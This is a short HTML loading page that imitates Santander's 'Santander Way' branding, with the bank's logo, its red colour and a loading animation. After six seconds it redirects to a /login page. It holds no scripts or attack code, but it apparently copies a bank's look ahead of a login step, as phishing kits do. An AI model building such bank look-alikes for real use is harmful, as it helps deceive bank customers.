
<html>
    <head>
        <meta name="theme-color" content="#DF0202"/>
        <title>Santander Way</title>
        <link rel="shortcut icon" href="logo.png">
        <meta name="viewport" content="width=device-width, initial-scale=1"/>
        <meta name="content-type" content="text/html" charset="utf-8"/>
        <meta http-equiv="refresh" content="6;/login"/>
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">        
        <style>
            body{
                background-color: #DF0202;
            }
            .img_center{
                text-align: center;
                margin-top: 50%;
            }
            .img_center img{
                text-align: center;
                width: 150px;
                height: 140px;
            }

            .bottom_img_logo{
                position: relative;
                float: right;
                margin-top: 60%;               
            }
            .bottom_img_logo img{
                text-align: right;
                width: 100px;
            }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col-sm-12">
                    <div class="img_center">
                        <img src="img/HomeLoading.gif"/>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-sm-12">
                    <div class="bottom_img_logo">
                        <img src="img/SantanderLogo.png" >
                    </div>
                </div>
            </div>
        </div>  
    </body>
</html>